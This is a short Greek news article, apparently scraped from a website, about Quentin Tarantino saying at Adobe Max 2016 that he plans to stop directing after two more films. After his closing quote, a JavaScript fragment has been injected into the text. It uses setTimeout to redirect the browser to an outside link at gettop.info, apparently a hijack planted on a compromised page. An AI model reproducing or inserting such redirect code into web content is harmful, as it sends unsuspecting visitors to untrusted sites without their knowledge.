Τη… συνταξιοδότησή του προανήγγειλε ο Ταραντίνο!

0
8

 

Την απόσυρσή του από… την καρέκλα του σκηνοθέτη προανήγγειλε ο Κούεντιν Ταραντίνο ο οποίος επιβεβαίωσε ότι σχεδιάζει να εγκαταλείψει τη σκηνοθεσία έπειτα από ακόμη δύο ταινίες. Όπως τόνισε ο δημιουργός των ταινιών «Pulp Fiction» και «Reservoir Dogs», ελπίζει πως όταν θα αποσυρθεί θα θεωρείται «ένας από τους μεγαλύτερους κινηματογραφιστές που έζησαν ποτέ».

Ο Κουέντιν Ταραντίνο υπαινίχθηκε από το 2012 ότι σχεδιάζει να κλείσει την καριέρα του ως σκηνοθέτης στις 10 ταινίες και στη συνέχεια να προχωρήσει στη συγγραφή μυθιστορημάτων και στο θέατρο.

Η ταινία «The Hateful Eight» που κυκλοφόρησε τον Ιανουάριο είναι η όγδοη που έχει σκηνοθετήσει.

Στη διάσκεψη δημιουργικότητας Adobe Max 2016 στο Σαν Ντιέγκο, ο Ταραντίνο απαντώντας στην ερώτηση πως προσδιορίζει προσωπικά την ευτυχία, απάντησε:

«Αν όλα πάνε καλά, ευτυχία θα είναι όταν ολοκληρώσω την καριέρα μου να θεωρούμαι ένας από τους μεγαλύτερους κινηματογραφιστές που έζησε ποτέ», απάντησε. «Και να προχωρήσω ακόμη περισσότερο να θεωρούμαι ένας μεγάλος καλλιτέχνης, όχι μόνο κινηματογραφιστής». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here